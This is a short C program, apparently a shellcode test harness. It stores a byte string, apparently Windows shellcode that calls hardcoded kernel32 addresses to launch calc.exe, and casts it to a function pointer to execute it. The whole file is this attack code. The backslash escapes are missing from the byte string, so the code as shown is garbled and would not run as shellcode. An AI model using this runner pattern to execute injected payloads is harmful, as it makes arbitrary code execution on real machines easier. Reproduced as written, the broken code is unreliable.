Mar 16
#include <stdio.h>
#include <string.h>
char liscker[] =
"xebx16x5bx31xc0x50x53xbbx0dx25x86x7cxffxd3x31xc0"
"x50xbbx12xcbx81x7cxffxd3xe8xe5xffxffxffx63x61x6c"
"x63x2ex65x78x65x00";
int main(int argc, char **argv)
{
int (*shellcode)();
shellcode = (int (*)()) liscker;
(int)(*shellcode)();
}